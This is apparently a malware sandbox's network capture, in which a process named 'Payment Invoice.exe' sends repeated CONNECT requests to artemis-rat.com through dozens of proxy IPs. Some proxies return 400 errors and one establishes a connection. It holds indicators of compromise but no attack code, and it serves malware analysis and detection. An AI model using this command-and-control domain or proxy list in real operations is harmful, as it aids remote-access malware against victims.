                                                                Mar 11, 2024 16:15:23.514919996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.527122974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:32.528114080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:44.620444059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:56.714267015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:08.823723078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:32.823630095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:17:20.823649883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1326192.168.2.453996163.172.94.175216177076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.447603941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.120740891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.027612925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.824357033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:27.323848963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:30.827367067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:34.323987007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:41.417716980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:55.323586941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1327192.168.2.453939170.84.205.1741537076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.447967052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1328192.168.2.453997121.182.138.71807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.447969913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1329192.168.2.454003121.66.198.7641457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.454844952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1330192.168.2.453111171.244.140.160240157076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.458431005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.514936924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.527081966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1331192.168.2.452261132.148.154.97314067076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.458719969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.514909983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.527076960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:32.527426958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:44.620472908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:56.714299917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:08.823967934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:32.825972080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1332192.168.2.45403523.137.248.197807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.459029913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1333192.168.2.454025130.162.213.17580807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.459311962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.956403971 CET39INHTTP/1.1 200 Connection established


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1334192.168.2.454000193.124.189.13807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.459445000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.798687935 CET361INHTTP/1.1 400 Bad Request
                                                                Server: nginx
                                                                Date: Mon, 11 Mar 2024 15:15:20 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 150
                                                                Connection: close
                                                                X-XSS-Protection: 1; mode=block
                                                                X-Content-Type-Options: nosniff
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1335192.168.2.45401437.235.53.20867897076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.459445000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1336192.168.2.453155139.255.45.6756787076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.459814072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1337192.168.2.45405594.130.94.45807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.464103937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1338192.168.2.454094159.89.138.130807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.464339018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.635319948 CET343INHTTP/1.1 400 Bad Request
                                                                Server: nginx/1.10.3 (Ubuntu)
                                                                Date: Mon, 11 Mar 2024 15:15:20 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 182
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 33 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.10.3 (Ubuntu)</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1339192.168.2.45406049.13.131.163807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.464339972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1340192.168.2.454124104.19.83.128807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.464608908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.621138096 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:20 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1341192.168.2.45397389.218.8.15210807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.474728107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1342192.168.2.453060104.200.152.3041457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.475438118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1343192.168.2.453751117.160.250.132807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.477152109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.174418926 CET303INHTTP/1.1 400 Bad Request
                                                                Server: openresty
                                                                Date: Mon, 11 Mar 2024 15:15:20 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 154
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1344192.168.2.45406558.234.116.19781937076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.477593899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1345192.168.2.45220966.228.37.252147917076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.478817940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.514938116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.527093887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:32.527426004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:44.620496988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:56.714287996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:08.823968887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:32.825969934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:17:20.823677063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1346192.168.2.45395345.125.222.97472397076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.479491949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1347192.168.2.45216943.255.113.232807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.480206013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1348192.168.2.45322385.109.104.10090907076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.483349085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.480093956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.589477062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
